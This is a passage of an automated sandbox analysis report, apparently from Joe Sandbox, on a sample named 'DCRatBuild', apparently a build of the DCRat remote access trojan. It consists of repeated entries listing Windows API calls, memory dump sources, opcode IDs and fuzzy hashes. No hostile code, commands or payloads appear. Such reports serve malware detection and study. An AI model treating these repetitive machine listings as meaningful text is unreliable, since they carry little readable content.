                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorFileLastPointer
                      • String ID:
                      • API String ID: 2976181284-0
                      • Opcode ID: 9f1153c40e844e64aaeae1bdeaf305c18b03ec3f3231efa12ae5d442fe0dd33b
                      • Instruction ID: b2eff64be839b60c3f0f038caaaa75d8d875fe00dc3dd744862a468299e6c4ac
                      • Opcode Fuzzy Hash: 9f1153c40e844e64aaeae1bdeaf305c18b03ec3f3231efa12ae5d442fe0dd33b
                      • Instruction Fuzzy Hash: AF01A1312043159B8B08CE6DBCE496AF39DEFC5721B18452EF956C7290CA31D8099A31
                      APIs
                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D69E76
                      • GetLastError.KERNEL32 ref: 00D69E82
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorFileLastPointer
                      • String ID:
                      • API String ID: 2976181284-0
                      • Opcode ID: 8794214d0844c5aa383f157b3123ddbbb31f6130425678646ff194985d320dd3
                      • Instruction ID: 2f8d867131816f4b4d745745d29f0885b47e2fb23e874891f98336ee128f46ab
                      • Opcode Fuzzy Hash: 8794214d0844c5aa383f157b3123ddbbb31f6130425678646ff194985d320dd3
                      • Instruction Fuzzy Hash: 7B019EB53063005BEB34DE29DC54B6BF6DD9B88314F18493EB146C3681DA32EC488630
                      APIs
                      • _free.LIBCMT ref: 00D88627
                        • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00DA0F50,00D6CE57,?,?,?,?,?,?), ref: 00D88663
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Heap$AllocAllocate_free
                      • String ID:
                      • API String ID: 2447670028-0
                      • Opcode ID: 1c50d0ecde9365842b8fbde332a8b216ff609a0c4d2ea2dff328e1c009916b11
                      • Instruction ID: a436cb418d46f05ecc8aa74eeff30a2961660f4dabece6684e5a46ac9a5a49e1
                      • Opcode Fuzzy Hash: 1c50d0ecde9365842b8fbde332a8b216ff609a0c4d2ea2dff328e1c009916b11
                      • Instruction Fuzzy Hash: E6F0CD32241216AACB213A25AC02F6F6768DF92BB0FA84116F85496191FF20CC00B7B4
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?), ref: 00D70915
                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D7091C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Process$AffinityCurrentMask
                      • String ID:
                      • API String ID: 1231390398-0
                      • Opcode ID: 64fee3f3cd886bddb936187a83ed9189cce87e5aeab8261afbb1ae1deb8ccb09
                      • Instruction ID: 04229e7b5a45befb91ebb03e1995bb101e82ff558d12347eb181dc7698499d77
                      • Opcode Fuzzy Hash: 64fee3f3cd886bddb936187a83ed9189cce87e5aeab8261afbb1ae1deb8ccb09
                      • Instruction Fuzzy Hash: ECE09B36A10105EB6F05CAA49C044BB7B9DDB0421071C817ABA0ED3241F770DD018E70
                      APIs
                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A458
                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A489
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 821d3f81cac55657c2cee26158d135caa0f3f73f3972ace0cb4929145ca368b0
                      • Instruction ID: 247ea3949b77df5b370d6aa09adceb134a1299b54f591ef051532c0f9b4a1946
                      • Opcode Fuzzy Hash: 821d3f81cac55657c2cee26158d135caa0f3f73f3972ace0cb4929145ca368b0
                      • Instruction Fuzzy Hash: DEF01C312402097BDF115EA5DC45BD9776CAB04385F488052BC8CD6261DB769EA8AA71
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemText_swprintf
                      • String ID:
                      • API String ID: 3011073432-0
                      • Opcode ID: 0cad09f5fcbd4fcfcdbf8c024e3cfe8ce461d8c516383b7080408f6ca923cba5
                      • Instruction ID: e4883802f8a9a213ce3f1ebe408be7d723302a6458b0106332828f6b917e5ec8
                      • Opcode Fuzzy Hash: 0cad09f5fcbd4fcfcdbf8c024e3cfe8ce461d8c516383b7080408f6ca923cba5
                      • Instruction Fuzzy Hash: 61F05C319003483BDB11AB709C02FAD371EDB09745F040581B604971A1E9716E204771
                      APIs
                      • DeleteFileW.KERNELBASE(?,?,?,00D6984C,?,?,00D69688,?,?,?,?,00D91FA1,000000FF), ref: 00D6A13E
                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D6984C,?,?,00D69688,?,?,?,?,00D91FA1,000000FF), ref: 00D6A16C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: 3e96efc4dc68cd4cc4006f6db166f917619be78babac38f23887257ac2b0af2e
                      • Instruction ID: f1b38bbb08a1dd635c15eb40c3dcbe62767ca091cd713b6d38a0bf08bc82b3b4
                      • Opcode Fuzzy Hash: 3e96efc4dc68cd4cc4006f6db166f917619be78babac38f23887257ac2b0af2e
                      • Instruction Fuzzy Hash: 8DE092356803086BDB119F64DC42FE9775CEB09382F484066B888D7160EB61DDD4AEB1
                      APIs
                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00D91FA1,000000FF), ref: 00D7A3D1
                      • CoUninitialize.COMBASE(?,?,?,?,00D91FA1,000000FF), ref: 00D7A3D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: GdiplusShutdownUninitialize
                      • String ID:
                      • API String ID: 3856339756-0
                      APIs
                      • GetFileAttributesW.KERNELBASE(?,?,?,00D6A189,?,00D676B2,?,?,?,?), ref: 00D6A1A5
                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D6A189,?,00D676B2,?,?,?,?), ref: 00D6A1D1
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      APIs
                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                      Similarity
                      • API ID: DirectoryLibraryLoadSystem
                      • String ID:
                      • API String ID: 1175261203-0
                      APIs
                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D79B37
                      Similarity
                      • API ID: BitmapCreateFromGdipStream
                      • String ID:
                      • API String ID: 1918208029-0
                      APIs
                        • Part of subcall function 00D8329A: try_get_function.LIBVCRUNTIME ref: 00D832AF
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D8217A
                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D82185
                      Similarity
                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                      • String ID:
                      • API String ID: 806969131-0
                      APIs
                      • DloadLock.DELAYIMP ref: 00D7DC73
                      • DloadProtectSection.DELAYIMP ref: 00D7DC8F
                        • Part of subcall function 00D7DE67: DloadObtainSection.DELAYIMP ref: 00D7DE77
                      Similarity
                      • API ID: Dload$Section$LockObtainProtect
                      • String ID:
                      • API String ID: 731663317-0
                      APIs
                      Similarity
                      • API ID: ItemShowWindow
                      • String ID:
                      • API String ID: 3351165006-0
                      APIs
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      APIs
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D68384
                        • Part of subcall function 00D61380: __EH_prolog.LIBCMT ref: 00D61385
                        • Part of subcall function 00D61380: new.LIBCMT ref: 00D613FE
                        • Part of subcall function 00D619A6: __EH_prolog.LIBCMT ref: 00D619AB
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D61E05
                        • Part of subcall function 00D63B3D: __EH_prolog.LIBCMT ref: 00D63B42
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D7A7C8
                        • Part of subcall function 00D61380: __EH_prolog.LIBCMT ref: 00D61385
                        • Part of subcall function 00D61380: new.LIBCMT ref: 00D613FE
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      APIs
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D65BDC
                        • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      APIs
                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D6A4F5
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      APIs
                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00D706B1
                      Similarity
                      • API ID: ExecutionStateThread
                      • String ID:
                      • API String ID: 2211380416-0
                      APIs
                      • GdipAlloc.GDIPLUS(00000010), ref: 00D79D81
                        • Part of subcall function 00D79B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
                      Similarity
                      • API ID: Gdip$AllocBitmapCreateFromStream
                      • String ID:
                      • API String ID: 1915507550-0
                      • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                      • Instruction ID: 9e65e4e66285976bb9157a66cc91f037b0df3507596b97c63df611b6aa89c823
                      • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                      • Instruction Fuzzy Hash: 6ED0A73121820C7ADF50BA748C13A7AFBA8DB04310F00C065BC0CC6141FD71DE10A671
                      APIs
                      • GetFileType.KERNELBASE(000000FF,00D69887), ref: 00D69995
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FileType
                      • String ID:
                      • API String ID: 3081899298-0
                      • Opcode ID: 7da1f3bba73b06e636cf38f669ffe530bdc6ba971ab68dd5d725faf2a147da90
                      • Instruction ID: f0930f5cb171996b8e9868c7f61c8344196abb386d7d4f61f3e42bd474ce8007
                      • Opcode Fuzzy Hash: 7da1f3bba73b06e636cf38f669ffe530bdc6ba971ab68dd5d725faf2a147da90
                      • Instruction Fuzzy Hash: 64D01231011280978F394A344D19099B755DB83366B3CE6AAD025C40A1D733C803F961
                      APIs
                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D7D43F
                        • Part of subcall function 00D7AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                        • Part of subcall function 00D7AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                        • Part of subcall function 00D7AC74: IsDialogMessageW.USER32(000103F6,?), ref: 00D7ACAA
                        • Part of subcall function 00D7AC74: TranslateMessage.USER32(?), ref: 00D7ACB8
                        • Part of subcall function 00D7AC74: DispatchMessageW.USER32(?), ref: 00D7ACC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                      • String ID:
                      • API String ID: 897784432-0
                      • Opcode ID: 9e4d44fcaaf59a4fc2677b7a9f9bca4a899698e8f389f7ceb36f18536383ff7c
                      • Instruction ID: 43f9f5c236e4ce10a5ba1955825b7aa473c18cce8705a94b307421d9470d12ce
                      • Opcode Fuzzy Hash: 9e4d44fcaaf59a4fc2677b7a9f9bca4a899698e8f389f7ceb36f18536383ff7c
                      • Instruction Fuzzy Hash: 3AD09E31144301BBD6162B51DE06F1F7AA6EB88B04F004554B348B40B1C6A29D30AB36
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 17097ca10dccfe11fb623aab123b3a662397ae45425a9c9116f9a5d4fb46c0e7
                      • Instruction ID: faeed1a487a1b297fa3498ee99b62c840150134575a9eaa62191df963a14e128
                      • Opcode Fuzzy Hash: 17097ca10dccfe11fb623aab123b3a662397ae45425a9c9116f9a5d4fb46c0e7
                      • Instruction Fuzzy Hash: AEB012A226C2026C320871047D03E36162DCCC1B20330C01FF48FD12C0F4409C084432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: f56e9e033de43fd96e1dc6f890bc2a6322e0d126cb7b80068437285263e7c648
                      • Instruction ID: 4f28a45d7a2a12902ed40103cdbc38f29fdb41ba3d523e016dad58509c972a62
                      • Opcode Fuzzy Hash: f56e9e033de43fd96e1dc6f890bc2a6322e0d126cb7b80068437285263e7c648
                      • Instruction Fuzzy Hash: 42B0129126C2426C324871047D03E36162DCCC0B20331C12FF04FD13C0F4409C8D4432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: b18906f7455baac357f4644615b6aebce14c0091c9de7d2c55a2629332b2fcd7
                      • Instruction ID: 5d01a11d8a0657f36c2dce196977f95d1f688d47d49c332676c7b8f24810f488
                      • Opcode Fuzzy Hash: b18906f7455baac357f4644615b6aebce14c0091c9de7d2c55a2629332b2fcd7
                      • Instruction Fuzzy Hash: B0B0129126C1026C320C75057E03E36162DCCC0B20330C02FF04FD13C0F4809C0E5432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 77b49763e4ff6b6cdb2603ac421ec8b2300cebbf90faaa01aaa41ba5ea70bb7e
                      • Instruction ID: 68eb83d5e7565c800cf5e8088429162ee19d4a19986f0fa5096090b59dcfe65f
                      • Opcode Fuzzy Hash: 77b49763e4ff6b6cdb2603ac421ec8b2300cebbf90faaa01aaa41ba5ea70bb7e
                      • Instruction Fuzzy Hash: 02B012A126C1026C320C71057E03E36162DCCC0B20330C01FF08FD12C0F4809D094432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 1a5a1117fa207f62043195f72682d3c70caad2e6159f44d9c8ccd54bfb3c252a
                      • Instruction ID: d5d31441835687fb5679566ff4d3971041bf051fbbe8b41ce962af2e07917c9c
                      • Opcode Fuzzy Hash: 1a5a1117fa207f62043195f72682d3c70caad2e6159f44d9c8ccd54bfb3c252a
                      • Instruction Fuzzy Hash: 03B012A126C1026C320C71057D03E36162DCCC0B20330C01FF08FD12C0F8409C084432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
